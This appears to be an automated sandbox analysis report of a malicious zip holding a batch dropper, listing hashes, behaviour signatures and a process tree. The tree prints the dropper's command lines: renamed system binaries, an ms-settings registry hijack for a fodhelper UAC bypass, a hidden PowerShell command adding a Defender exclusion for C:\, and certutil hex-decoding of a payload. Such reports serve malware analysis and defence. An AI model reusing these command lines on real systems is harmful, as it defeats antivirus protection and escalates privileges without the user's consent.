Analysis

max time kernel: 146s
max time network: 118s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 09-05-2024 09:58

Static task: static1

Behavioral task: behavioral1
Sample: 17168848892.zip
Resource: win7-20240508-en

Behavioral task: behavioral2
Sample: 17168848892.zip
Resource: win10v2004-20240426-en
General

Target: 17168848892.zip
Size: 676KB
MD5: 21aa22e186d07a35986264f71c3f2908
SHA1: ae4a9fb6a15713115c5f68864bbab4c4b2094fd1
SHA256: f4906dec2cbdc33af12960aada4dfb76ba22616363fe7fcb26190523ba1cf0f7
SHA512: 6fc5b97cff11faf1acd29b373067218fd5d202dee7d4cebc887e0ecad8648acd971e2c0487c9677f1aee97c12f13a1f4909667836e04800fee30fe7303598505
SSDEEP: 12288:YCfKAF6dLivsaQaOLi2PB2hXatDuQJy1tTs2u9bdNfOOY0hkwNzZ:hSAc+vsCAi2p2hKtDuvLzA/hn1Z
Malware Config
Signatures

Executes dropped EXE (25 IoCs)

| pid  | Process    |
|------|------------|
| 2992 | alpha.exe  |
| 3004 | alpha.exe  |
| 1864 | alpha.exe  |
| 2496 | alpha.exe  |
| 2820 | alpha.exe  |
| 2844 | alpha.exe  |
| 2248 | alpha.exe  |
| 2020 | xkn.exe    |
| 1312 | alpha.exe  |
| 1236 | ger.exe    |
| 1808 | alpha.exe  |
| 2400 | kn.exe     |
| 2880 | alpha.exe  |
| 1064 | kn.exe     |
| 576  | alpha.exe  |
| 1816 | alpha.exe  |
| 1224 | alpha.exe  |
| 780  | sppsvc.pif |
| 1756 | alpha.exe  |
| 1416 | alpha.exe  |
| 2340 | alpha.exe  |
| 1668 | alpha.exe  |
| 2984 | alpha.exe  |
| 1108 | alpha.exe  |
| 2928 | alpha.exe  |

Loads dropped DLL (8 IoCs)

| pid  | Process      |
|------|--------------|
| 2540 | cmd.exe      |
| 2248 | alpha.exe    |
| 2020 | xkn.exe      |
| 2020 | xkn.exe      |
| 1312 | alpha.exe    |
| 1808 | alpha.exe    |
| 1648 | WerFault.exe |
| 1648 | WerFault.exe |

Enumerates physical storage devices (1 TTPs)

Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoCs)

| pid  | pid_target | Process      | procid_target |
|------|------------|--------------|---------------|
| 1648 | 780        | WerFault.exe | 58            |

Kills process with taskkill (1 IoCs)

| pid | Process      |
|-----|--------------|
| 688 | taskkill.exe |

Modifies registry class (5 IoCs)

| description     | ioc | Process |
|-----------------|-----|---------|
| Key created     | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open\command | ger.exe |
| Key created     | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings | ger.exe |
| Key created     | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell | ger.exe |
| Key created     | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open | ger.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | ger.exe |

Runs ping.exe (1 TTPs, 1 IoCs)

| pid | Process  |
|-----|----------|
| 304 | PING.EXE |

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)

| pid | Process    |
|-----|------------|
| 780 | sppsvc.pif |

Suspicious behavior: EnumeratesProcesses (1 IoCs)

| pid  | Process |
|------|---------|
| 2020 | xkn.exe |

Suspicious use of AdjustPrivilegeToken (5 IoCs)

| description                | pid  | Process      |
|----------------------------|------|--------------|
| Token: SeRestorePrivilege  | 2744 | 7zFM.exe     |
| Token: 35                  | 2744 | 7zFM.exe     |
| Token: SeSecurityPrivilege | 2744 | 7zFM.exe     |
| Token: SeDebugPrivilege    | 2020 | xkn.exe      |
| Token: SeDebugPrivilege    | 688  | taskkill.exe |

Suspicious use of FindShellTrayWindow (2 IoCs)

| pid  | Process  |
|------|----------|
| 2744 | 7zFM.exe |
| 2744 | 7zFM.exe |

Suspicious use of WriteProcessMemory (64 IoCs)

| description                        | pid  | Process   | procid_target |
|------------------------------------|------|-----------|---------------|
| PID 2540 wrote to memory of 2988   | 2540 | cmd.exe   | 34 |
| PID 2540 wrote to memory of 2988   | 2540 | cmd.exe   | 34 |
| PID 2540 wrote to memory of 2988   | 2540 | cmd.exe   | 34 |
| PID 2540 wrote to memory of 2992   | 2540 | cmd.exe   | 35 |
| PID 2540 wrote to memory of 2992   | 2540 | cmd.exe   | 35 |
| PID 2540 wrote to memory of 2992   | 2540 | cmd.exe   | 35 |
| PID 2540 wrote to memory of 3004   | 2540 | cmd.exe   | 36 |
| PID 2540 wrote to memory of 3004   | 2540 | cmd.exe   | 36 |
| PID 2540 wrote to memory of 3004   | 2540 | cmd.exe   | 36 |
| PID 2540 wrote to memory of 1864   | 2540 | cmd.exe   | 37 |
| PID 2540 wrote to memory of 1864   | 2540 | cmd.exe   | 37 |
| PID 2540 wrote to memory of 1864   | 2540 | cmd.exe   | 37 |
| PID 1864 wrote to memory of 1912   | 1864 | alpha.exe | 38 |
| PID 1864 wrote to memory of 1912   | 1864 | alpha.exe | 38 |
| PID 1864 wrote to memory of 1912   | 1864 | alpha.exe | 38 |
| PID 2540 wrote to memory of 2496   | 2540 | cmd.exe   | 39 |
| PID 2540 wrote to memory of 2496   | 2540 | cmd.exe   | 39 |
| PID 2540 wrote to memory of 2496   | 2540 | cmd.exe   | 39 |
| PID 2496 wrote to memory of 2608   | 2496 | alpha.exe | 40 |
| PID 2496 wrote to memory of 2608   | 2496 | alpha.exe | 40 |
| PID 2496 wrote to memory of 2608   | 2496 | alpha.exe | 40 |
| PID 2540 wrote to memory of 2820   | 2540 | cmd.exe   | 41 |
| PID 2540 wrote to memory of 2820   | 2540 | cmd.exe   | 41 |
| PID 2540 wrote to memory of 2820   | 2540 | cmd.exe   | 41 |
| PID 2820 wrote to memory of 2828   | 2820 | alpha.exe | 42 |
| PID 2820 wrote to memory of 2828   | 2820 | alpha.exe | 42 |
| PID 2820 wrote to memory of 2828   | 2820 | alpha.exe | 42 |
| PID 2540 wrote to memory of 2844   | 2540 | cmd.exe   | 43 |
| PID 2540 wrote to memory of 2844   | 2540 | cmd.exe   | 43 |
| PID 2540 wrote to memory of 2844   | 2540 | cmd.exe   | 43 |
| PID 2844 wrote to memory of 1328   | 2844 | alpha.exe | 44 |
| PID 2844 wrote to memory of 1328   | 2844 | alpha.exe | 44 |
| PID 2844 wrote to memory of 1328   | 2844 | alpha.exe | 44 |
| PID 2540 wrote to memory of 2248   | 2540 | cmd.exe   | 45 |
| PID 2540 wrote to memory of 2248   | 2540 | cmd.exe   | 45 |
| PID 2540 wrote to memory of 2248   | 2540 | cmd.exe   | 45 |
| PID 2248 wrote to memory of 2020   | 2248 | alpha.exe | 46 |
| PID 2248 wrote to memory of 2020   | 2248 | alpha.exe | 46 |
| PID 2248 wrote to memory of 2020   | 2248 | alpha.exe | 46 |
| PID 2020 wrote to memory of 1312   | 2020 | xkn.exe   | 47 |
| PID 2020 wrote to memory of 1312   | 2020 | xkn.exe   | 47 |
| PID 2020 wrote to memory of 1312   | 2020 | xkn.exe   | 47 |
| PID 1312 wrote to memory of 1236   | 1312 | alpha.exe | 48 |
| PID 1312 wrote to memory of 1236   | 1312 | alpha.exe | 48 |
| PID 1312 wrote to memory of 1236   | 1312 | alpha.exe | 48 |
| PID 2540 wrote to memory of 1808   | 2540 | cmd.exe   | 49 |
| PID 2540 wrote to memory of 1808   | 2540 | cmd.exe   | 49 |
| PID 2540 wrote to memory of 1808   | 2540 | cmd.exe   | 49 |
| PID 1808 wrote to memory of 2400   | 1808 | alpha.exe | 50 |
| PID 1808 wrote to memory of 2400   | 1808 | alpha.exe | 50 |
| PID 1808 wrote to memory of 2400   | 1808 | alpha.exe | 50 |
| PID 2540 wrote to memory of 2880   | 2540 | cmd.exe   | 51 |
| PID 2540 wrote to memory of 2880   | 2540 | cmd.exe   | 51 |
| PID 2540 wrote to memory of 2880   | 2540 | cmd.exe   | 51 |
| PID 2880 wrote to memory of 1064   | 2880 | alpha.exe | 52 |
| PID 2880 wrote to memory of 1064   | 2880 | alpha.exe | 52 |
| PID 2880 wrote to memory of 1064   | 2880 | alpha.exe | 52 |
| PID 2540 wrote to memory of 576    | 2540 | cmd.exe   | 53 |
| PID 2540 wrote to memory of 576    | 2540 | cmd.exe   | 53 |
| PID 2540 wrote to memory of 576    | 2540 | cmd.exe   | 53 |
| PID 576 wrote to memory of 688     | 576  | alpha.exe | 54 |
| PID 576 wrote to memory of 688     | 576  | alpha.exe | 54 |
| PID 576 wrote to memory of 688     | 576  | alpha.exe | 54 |
| PID 2540 wrote to memory of 1816   | 2540 | cmd.exe   | 56 |
Processes

Each entry gives the image path with its PID, the observed command line, and the signatures matched by that process. Indentation shows the parent/child relationship.

C:\Windows\Explorer.exe (PID 2188)
  Command: C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\17168848892.zip

C:\Windows\system32\verclsid.exe (PID 3060)
  Command: "C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401

C:\Program Files\7-Zip\7zFM.exe (PID 2744)
  Command: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\17168848892.zip"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow

C:\Windows\system32\cmd.exe (PID 2540)
  Command: cmd /c ""C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

    C:\Windows\System32\extrac32.exe (PID 2988)
      Command: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

    C:\Users\Public\alpha.exe (PID 2992)
      Command: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
      - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 3004)
      Command: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
      - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 1864)
      Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe (PID 1912)
          Command: extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"

    C:\Users\Public\alpha.exe (PID 2496)
      Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe (PID 2608)
          Command: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"

    C:\Users\Public\alpha.exe (PID 2820)
      Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe (PID 2828)
          Command: extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"

    C:\Users\Public\alpha.exe (PID 2844)
      Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe (PID 1328)
          Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

    C:\Users\Public\alpha.exe (PID 2248)
      Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

        C:\Users\Public\xkn.exe (PID 2020)
          Command: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

            C:\Users\Public\alpha.exe (PID 1312)
              Command: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              - Executes dropped EXE
              - Loads dropped DLL
              - Suspicious use of WriteProcessMemory

                C:\Users\Public\ger.exe (PID 1236)
                  Command: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                  - Executes dropped EXE
                  - Modifies registry class

    C:\Users\Public\alpha.exe (PID 1808)
      Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

        C:\Users\Public\kn.exe (PID 2400)
          Command: C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
          - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 2880)
      Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

        C:\Users\Public\kn.exe (PID 1064)
          Command: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
          - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 576)
      Command: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\taskkill.exe (PID 688)
          Command: taskkill /F /IM SystemSettings.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    C:\Users\Public\alpha.exe (PID 1816)
      Command: C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
      - Executes dropped EXE

        C:\Windows\system32\PING.EXE (PID 304)
          Command: ping 127.0.0.1 -n 2
          - Runs ping.exe

    C:\Users\Public\Libraries\sppsvc.pif (PID 780)
      Command: C:\Users\Public\Libraries\sppsvc.pif
      - Executes dropped EXE
      - Suspicious behavior: CmdExeWriteProcessMemorySpam

        C:\Windows\SysWOW64\WerFault.exe (PID 1648)
          Command: C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 676
          - Loads dropped DLL
          - Program crash

    C:\Users\Public\alpha.exe (PID 1224)
      Command: C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
      - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 1756)
      Command: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
      - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 1416)
      Command: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
      - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 2340)
      Command: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
      - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 1668)
      Command: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
      - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 2984)
      Command: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 1108)
      Command: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
      - Executes dropped EXE

    C:\Users\Public\alpha.exe (PID 2928)
      Command: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
      - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads